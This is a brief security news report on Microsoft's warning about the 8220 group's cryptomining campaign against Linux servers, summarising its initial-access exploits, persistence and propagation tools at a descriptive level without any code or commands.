Security News > 2022 > July > Microsoft Warns of Cryptomining Malware Campaign Targeting Linux Servers

A cloud threat actor group tracked as 8220 has updated its malware toolset to breach Linux servers with the goal of installing crypto miners as part of a long-running campaign.

"The updates include the deployment of new versions of a crypto miner and an IRC bot," Microsoft Security Intelligence said in a series of tweets on Thursday.

8220, active since early 2017, is a Chinese-speaking, Monero-mining threat actor so named for its preference to communicate with command-and-control servers over port 8220.

Now according to Microsoft, the most recent campaign striking i686 and x86 64 Linux systems has been observed weaponizing remote code execution exploits for the freshly disclosed Atlassian Confluence Server and Oracle WebLogic for initial access.

Besides achieving persistence by means of a cron job, the "Loader uses the IP port scanner tool 'masscan' to find other SSH servers in the network, and then uses the GoLang-based SSH brute force tool 'spirit' to propagate," Microsoft said.

The attacks range from vulnerability probes to determine if the target system is susceptible to injection of malware such as web shells and crypto miners, the cloud security company noted.

News URL

https://thehackernews.com/2022/06/microsoft-warns-of-cryptomining-malware.html